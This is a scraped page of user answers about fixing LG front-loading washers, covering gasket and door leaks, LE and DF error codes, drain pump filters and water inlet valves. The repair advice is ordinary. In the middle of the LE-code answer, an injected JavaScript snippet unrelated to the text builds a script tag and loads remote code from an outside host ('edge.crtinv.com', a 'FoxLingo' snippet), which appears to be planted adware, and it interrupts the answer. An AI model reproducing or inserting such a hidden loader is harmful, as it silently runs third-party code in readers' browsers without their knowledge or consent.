LG washer retaining ring problem
Get a second person to help you. Just slowly start at the top. Have your hands go down each side tucking it in and have your friend prevent it from coming out. I know it's a pain but it can be down. That tool is a life saver.
Water leaks past the water pump filter gasket
I regularly clean my filter of slime and debris (after not even realizing this needed to be done and having my pump give out of me). TWICE I have awoken to a flooded basement due to leaks in the filter area: The first time, the plastic stopper was not in the small rubber drain hose properly and had popped off. The second time, I had cleaned the gasket, inserted it tightly like I always do, and awoke to another flood! I thought perhaps the rubber gasket on the filter was on wrong, but it was fine. I inserted it tightly several times and water still poured out! It turns out there was a small stone lodged in the thread of the receiving end of the filter causing there to be a bad seal. Lesson learned. Another $2000.00 worth of flooring ruined.
Small ammount of water leaks at bottom of door during wash
I have this same problem. What I do is carefully clean the part of the glass door where it meets the rubber gasket when you close the door. Bits of crud tend to accumulate there and break the seal between the smooth glass and the rubber gasket. This causes small amounts of water to leak out.
I don't use an abrasive cleanser. I generally clean it when it is dry and crusty with my hand or with my fingernails if it stubborn. You don't want to scratch the smooth glass surface. fingernails are much softer than glass and won't scratch the glass.
I also take a look at the rubber gasket and see if there is any crud sticking on that and very gently clean it off when it is dry and crusty. If the gasket gets torn, you'll probably need to replace it. I don't know how much that would cost. This should stop the dribbles.

Zac
LE code
LE error is a locked rotor you need to have your hall sensor on the stator or better yet just have the whole stator replaced which comes with the sensor on it (P.S. the stator is part of the motor and has a 5 year warranty)
My front loader has an LE code on display. It stops the cycle and will not drain the water
This error indicates that the Motor Is Locked. This would usually be caused by one of the following:The white 3 pin male connector in the Motor Wiring Harness has become disconnected from the white female 3 pin connector in the Stator Assembly.The white 3 pin male connector in the Motor Wiring Harness and white 4 pin female connector in the Main PWB Assembly is bad or unstable.The Motor Harness between the Stator Assembly and the Main PWB Assembly is defective, open circuit, cut or damaged in some other way.The Hall sensor is defective and needs replacing.!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState '' this.readyState=="loaded" '' this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
Unit not going through spin cycle
i do not know about this lg front load but one thing is common about them.please inspect if the wash mode fills the water to it normal level. if it exceeds the level then take the plug out remove the back cover lid and you will notice that a black colour pipe usually connected to the drum goes to the horn type unit which is a switch. check the pipe id there is any leakage. the best way is to release from the drum side clean the tip and try to blow air from your mouth if the air leaks then put some rubber glue on the leaks let it dry and then check if the leak is removed.this is actually the master brain for the machine to detect the water which in turn makes the machine move since if there is water in the drum it will not spin.if this does not help then probably the timer is defective through which you set the cycle.please also check the water supply pipe that connects to your machine it has a filter which might be clogged. clean and try again.hope this has been useful
Wm1815cs not draining
Check the drain hose, if you washed something small like a childs sock it could get stuck where the hose connects to the washer.Another problem could be that your drain hose is too long and it is clogging up at the elbow of your drain line, if so cut of a few inches at a time and try to drain washer again
I changed out the drain
Hi
If the washer won't fill you'll need to check for the water
inlet hose, the water inlet valve and the pressure/water level switch assembly.
Inspect the inlet hose coming to the washer for any blockages. If the hose is
not clogged then check the water inlet valve for any clogs, if the water will
not even fill for few seconds then certainly the water inlet valve is bad and
should be replaced. You can also use a multimeter to check continuity on inlet
valve. If you don't get any value on the multimeter then you'll need to replace
the water inlet valve assembly. However, if the valve is fine then the
pressure/water level switch assembly should be replaced, there is no special sensor that can go bad. Hope this helps...
Please post back if you need more information.

While Pouring water Machine is showing DF error.
Hi from retired Englishman in SW France,
(possibly 'Drain Fault' so no promises but try this first! It could, however, be a Door Fault)
I would gently suggest as a first step that you clean the drain motor/pump lint tray/filter. So many 'faults' are caused by blocked filters and many machines will not even go to rinse or spin or release the door lock if there is any water still left inside.
Following are my complete and hopefully 'coverall' pre-typed guidance notes for checking both the drain motor filter and the drain motor ;-0)
REMOVE POWER AND ENSURE YOU HAVE A WATER RECEPTACLE/RAGS TO SOAK UP THE WATER WHICH IS BOUND TO POUR OUT (alternatively use a wet vac as sensibly suggested by VinnyB1234!)
If you are unsure where the filter is, it is often behind the front lower (kick) panel (or in some machines at the rear in an awkward position!). These panels are either held on by (plasic) screws or will just pull off. Most filters are held in by a round cover/knob. Sometimes the filter will not come out with the cover and you will have to persuade it to come out to play.
It's surprising what people have found in theirs! It is always worthwhile checking it on a regular basis.
Now- whilst the filter is removed it is normally possible to see the drain motor and ensure it is not jammed by a foreign object such as a needle or a toothpick. It should be able to be turned by hand/finger- the power IS OFF!
At this point it is also possible to test if the motor works. No clothes or water in the machine, select a spin cycle and put the power back on. You should be able to see the motor turning at some point, possibly straight away. Using something suitable like a glove see if it is easy to briefly slow the motor down. If it is easy then the motor is malfunctioning.
If this has assisted you please consider a 4 thumbs up for the rating.
Thanks and good luck!

Leak from bottom of unit.
Usually this is from a hose or the pump. Easiest way of doing this. Make sure you have towels for the water. Remove access panel and start a load. The water can be coming from the Door gasket which leads from door to basket, bellow which leads from tub to pump. drain hose which leads from pump to house drain. See where it is coming from and let me know I will tell you how to fix this and where to get parts. If you have any questions please feel free to comment.
